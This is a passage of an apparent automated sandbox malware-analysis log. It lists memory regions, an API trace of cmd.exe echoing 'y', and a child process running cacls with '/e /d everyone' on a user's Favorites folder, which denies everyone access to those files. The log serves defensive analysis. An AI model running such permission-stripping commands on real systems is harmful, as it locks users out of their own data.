filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 588 start_va = 0x7e890000 end_va = 0x7e8b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e890000" filename = "" Region: id = 589 start_va = 0x7e8b7000 end_va = 0x7e8b9fff entry_point = 0x0 region_type = private name = "private_0x000000007e8b7000" filename = "" Region: id = 590 start_va = 0x7e8ba000 end_va = 0x7e8bafff entry_point = 0x0 region_type = private name = "private_0x000000007e8ba000" filename = "" Region: id = 591 start_va = 0x7e8bd000 end_va = 0x7e8bdfff entry_point = 0x0 region_type = private name = "private_0x000000007e8bd000" filename = "" Region: id = 592 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 593 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 594 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 595 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 596 start_va = 0x770000 end_va = 0x77ffff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 597 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 598 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 599 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 618 start_va = 0x510000 end_va = 0x51ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 619 start_va = 0x6c0000 end_va = 0x73dfff entry_point = 0x6c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 620 start_va = 0x860000 end_va = 0x95ffff entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 621 start_va = 0xb30000 end_va = 0xb3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 622 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 623 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 624 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 625 start_va = 0x7e790000 end_va = 0x7e88ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e790000" filename = "" Region: id = 626 start_va = 0x520000 end_va = 0x523fff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Thread: id = 14 os_tid = 0xb6c [0035.817] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0035.817] __set_app_type (_Type=0x1) [0035.817] __p__fmode () returned 0x76ea1768 [0035.817] __p__commode () returned 0x76ea176c [0035.817] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0035.817] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0035.817] GetCurrentThreadId () returned 0xb6c [0035.817] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb6c) returned 0x30 [0035.817] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0035.817] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0035.817] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.819] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0035.819] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x68fc8c | out: phkResult=0x68fc8c*=0x0) returned 0x2 [0035.820] VirtualQuery (in: lpAddress=0x68fc9b, lpBuffer=0x68fc34, dwLength=0x1c | out: lpBuffer=0x68fc34*(BaseAddress=0x68f000, AllocationBase=0x590000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0035.820] VirtualQuery (in: lpAddress=0x590000, lpBuffer=0x68fc34, dwLength=0x1c | out: lpBuffer=0x68fc34*(BaseAddress=0x590000, AllocationBase=0x590000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0035.820] VirtualQuery (in: lpAddress=0x591000, lpBuffer=0x68fc34, dwLength=0x1c | out: lpBuffer=0x68fc34*(BaseAddress=0x591000, AllocationBase=0x590000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0035.820] VirtualQuery (in: lpAddress=0x593000, lpBuffer=0x68fc34, dwLength=0x1c | out: lpBuffer=0x68fc34*(BaseAddress=0x593000, AllocationBase=0x590000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0035.820] VirtualQuery (in: lpAddress=0x690000, lpBuffer=0x68fc34, dwLength=0x1c | out: lpBuffer=0x68fc34*(BaseAddress=0x690000, AllocationBase=0x690000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0035.820] GetConsoleOutputCP () returned 0x1b5 [0035.820] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.820] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0035.820] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.820] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x0) returned 0 [0035.820] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.820] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0035.820] _get_osfhandle (_FileHandle=0) returned 0x24 [0035.820] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0035.820] GetEnvironmentStringsW () returned 0x864058* [0035.820] FreeEnvironmentStringsA (penv="=") returned 1 [0035.820] GetEnvironmentStringsW () returned 0x864058* [0035.821] FreeEnvironmentStringsA (penv="=") returned 1 [0035.821] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x68ebdc | out: phkResult=0x68ebdc*=0x40) returned 0x0 [0035.821] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x68ebe4, lpData=0x68ebe8, lpcbData=0x68ebe0*=0x1000 | out: lpType=0x68ebe4*=0x0, lpData=0x68ebe8*=0xb2, lpcbData=0x68ebe0*=0x1000) returned 0x2 [0035.821] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x68ebe4, lpData=0x68ebe8, lpcbData=0x68ebe0*=0x1000 | out: lpType=0x68ebe4*=0x4, lpData=0x68ebe8*=0x1, lpcbData=0x68ebe0*=0x4) returned 0x0 [0035.821] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x68ebe4, lpData=0x68ebe8, lpcbData=0x68ebe0*=0x1000 | out: lpType=0x68ebe4*=0x0, lpData=0x68ebe8*=0x1, lpcbData=0x68ebe0*=0x1000) returned 0x2 [0035.821] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x68ebe4, lpData=0x68ebe8, lpcbData=0x68ebe0*=0x1000 | out: lpType=0x68ebe4*=0x4, lpData=0x68ebe8*=0x0, lpcbData=0x68ebe0*=0x4) returned 0x0 [0035.821] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x68ebe4, lpData=0x68ebe8, lpcbData=0x68ebe0*=0x1000 | out: lpType=0x68ebe4*=0x4, lpData=0x68ebe8*=0x40, lpcbData=0x68ebe0*=0x4) returned 0x0 [0035.821] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x68ebe4, lpData=0x68ebe8, lpcbData=0x68ebe0*=0x1000 | out: lpType=0x68ebe4*=0x4, lpData=0x68ebe8*=0x40, lpcbData=0x68ebe0*=0x4) returned 0x0 [0035.821] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x68ebe4, lpData=0x68ebe8, lpcbData=0x68ebe0*=0x1000 | out: lpType=0x68ebe4*=0x0, lpData=0x68ebe8*=0x40, lpcbData=0x68ebe0*=0x1000) returned 0x2 [0035.821] RegCloseKey (hKey=0x40) returned 0x0 [0035.821] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x68ebdc | out: phkResult=0x68ebdc*=0x40) returned 0x0 [0035.821] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x68ebe4, lpData=0x68ebe8, lpcbData=0x68ebe0*=0x1000 | out: lpType=0x68ebe4*=0x0, lpData=0x68ebe8*=0x40, lpcbData=0x68ebe0*=0x1000) returned 0x2 [0035.821] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x68ebe4, lpData=0x68ebe8, lpcbData=0x68ebe0*=0x1000 | out: lpType=0x68ebe4*=0x4, lpData=0x68ebe8*=0x1, lpcbData=0x68ebe0*=0x4) returned 0x0 [0035.821] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x68ebe4, lpData=0x68ebe8, lpcbData=0x68ebe0*=0x1000 | out: lpType=0x68ebe4*=0x0, lpData=0x68ebe8*=0x1, lpcbData=0x68ebe0*=0x1000) returned 0x2 [0035.821] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x68ebe4, lpData=0x68ebe8, lpcbData=0x68ebe0*=0x1000 | out: lpType=0x68ebe4*=0x4, lpData=0x68ebe8*=0x0, lpcbData=0x68ebe0*=0x4) returned 0x0 [0035.821] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x68ebe4, lpData=0x68ebe8, lpcbData=0x68ebe0*=0x1000 | out: lpType=0x68ebe4*=0x4, lpData=0x68ebe8*=0x9, lpcbData=0x68ebe0*=0x4) returned 0x0 [0035.821] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x68ebe4, lpData=0x68ebe8, lpcbData=0x68ebe0*=0x1000 | out: lpType=0x68ebe4*=0x4, lpData=0x68ebe8*=0x9, lpcbData=0x68ebe0*=0x4) returned 0x0 [0035.821] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x68ebe4, lpData=0x68ebe8, lpcbData=0x68ebe0*=0x1000 | out: lpType=0x68ebe4*=0x0, lpData=0x68ebe8*=0x9, lpcbData=0x68ebe0*=0x1000) returned 0x2 [0035.821] RegCloseKey (hKey=0x40) returned 0x0 [0035.821] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa5004f [0035.821] srand (_Seed=0x5aa5004f) [0035.821] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" [0035.821] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" [0035.821] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0035.822] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x864060, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0035.822] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0035.822] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.822] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0035.822] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0035.822] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0035.822] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0035.822] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0035.822] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0035.822] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0035.822] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0035.822] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0035.822] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0035.822] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0035.822] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x68f9bc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0035.822] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0x68f9bc, lpFilePart=0x68f9b8 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x68f9b8*="Desktop") returned 0x1c [0035.822] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0035.822] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x68f738 | out: lpFindFileData=0x68f738) returned 0x864270 [0035.822] FindClose (in: hFindFile=0x864270 | out: hFindFile=0x864270) returned 1 [0035.823] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0x68f738 | out: lpFindFileData=0x68f738) returned 0x864270 [0035.823] FindClose (in: hFindFile=0x864270 | out: hFindFile=0x864270) returned 1 [0035.823] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0035.823] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0x68f738 | out: lpFindFileData=0x68f738) returned 0x864270 [0035.823] FindClose (in: hFindFile=0x864270 | out: hFindFile=0x864270) returned 1 [0035.823] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0035.823] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0035.823] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0035.823] GetEnvironmentStringsW () returned 0x8660b0* [0035.823] FreeEnvironmentStringsA (penv="=") returned 1 [0035.823] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0035.824] GetConsoleOutputCP () returned 0x1b5 [0035.824] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.824] GetUserDefaultLCID () returned 0x409 [0035.824] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0035.824] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x68fae8, cchData=128 | out: lpLCData="0") returned 2 [0035.824] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x68fae8, cchData=128 | out: lpLCData="0") returned 2 [0035.824] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x68fae8, cchData=128 | out: lpLCData="1") returned 2 [0035.824] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0035.824] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0035.824] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0035.824] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0035.824] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0035.824] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0035.824] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0035.824] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0035.824] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0035.825] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0035.825] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0035.825] GetConsoleTitleW (in: lpConsoleTitle=0x864d78, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.826] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0035.826] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0035.826] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0035.826] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0035.826] _wcsicmp (_String1="echo", _String2=")") returned 60 [0035.826] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0035.826] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0035.826] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0035.826] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0035.826] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0035.826] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0035.827] GetConsoleTitleW (in: lpConsoleTitle=0x68f7d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.827] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0035.827] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0035.827] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0035.827] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0035.827] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0035.827] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0035.827] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0035.827] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0035.827] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0035.827] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0035.828] _vsnwprintf (in: _Buffer=0x12c8840, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x68f794 | out: _Buffer="y\r\n") returned 3 [0035.828] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.828] GetFileType (hFile=0x28) returned 0x3 [0035.828] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.828] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="y\r\n", cchWideChar=-1, lpMultiByteStr=0x12b6840, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\r\n", lpUsedDefaultChar=0x0) returned 4 [0035.828] WriteFile (in: hFile=0x28, lpBuffer=0x12b6840*, nNumberOfBytesToWrite=0x3, lpNumberOfBytesWritten=0x68f784, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesWritten=0x68f784*=0x3, lpOverlapped=0x0) returned 1 [0035.828] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.828] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x0) returned 0 [0035.828] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.828] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0035.828] _get_osfhandle (_FileHandle=0) returned 0x24 [0035.828] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0035.829] SetConsoleInputExeNameW () returned 0x1 [0035.829] GetConsoleOutputCP () returned 0x1b5 [0035.829] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.829] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.829] exit (_Code=0) Process: id = "13" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x11820000" os_pid = "0xb70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "cacls \"C:\\Users\\5JgHKoaOfdp\\Favorites\\*.*\" /e /d everyone" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 600 start_va = 0x9a0000 end_va = 0x9bffff entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 601 start_va = 0x9c0000 end_va = 0x9c1fff entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 602 start_va = 0x9d0000 end_va = 0x9defff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 603 start_va = 0x9e0000 end_va = 0xa1ffff entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 604 start_va = 0xa20000 end_va = 0xa5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 605 start_va = 0xa60000 end_va = 0xa63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 606 start_va = 0xa70000 end_va = 0xa70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 607 start_va = 0xa80000 end_va = 0xa81fff entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 608 start_va = 0xb30000 end_va = 0xb39fff entry_point = 0xb30000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\SysWOW64\\cacls.exe" (normalized: "c:\\windows\\syswow64\\cacls.exe") Region: id = 609 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 610 start_va = 0x7f770000 end_va = 0x7f792fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f770000" filename = "" Region: id = 611 start_va = 0x7f796000 end_va = 0x7f796fff entry_point = 0x0 region_type = private name = "private_0x000000007f796000" filename = "" Region: id = 612 start_va = 0x7f79a000 end_va = 0x7f79afff entry_point = 0x0 region_type = private name = "private_0x000000007f79a000" filename = "" Region: id = 613 start_va = 0x7f79d000 end_va = 0x7f79ffff entry_point = 0x0 region_type = private name = "private_0x000000007f79d000" filename = "" Region: id = 614 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 615 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 616 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 617 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 627 start_va = 0xc80000 end_va = 0xc8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c80000" filename = "" Region: id = 628 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 629 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 630 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 631 start_va = 0x9a0000 end_va = 0x9affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 632 start_va = 0x9b0000 end_va = 0x9b3fff entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 633 start_va = 0x9c0000 end_va = 0x9c3fff entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 634 start_va = 0xa90000 end_va = 0xb0dfff entry_point = 0xa90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 635 start_va = 0xb10000 end_va = 0xb12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b10000" filename = "" Region: id = 636 start_va = 0xb20000 end_va = 0xb20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 637 start_va = 0xb40000 end_va = 0xb41fff entry_point = 0xb40000 region_type = mapped_file name = "cacls.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cacls.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cacls.exe.mui") Region: id = 638 start_va = 0xb70000 end_va = 0xb7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 639 start_va = 0xe30000 end_va = 0xf2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 640 start_va = 0xf30000 end_va = 0x1204fff entry_point = 0xf30000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 641 start_va = 0x747f0000 end_va = 0x74814fff entry_point = 0x747f0000 region_type = mapped_file name = "ntmarta.dll" filename = 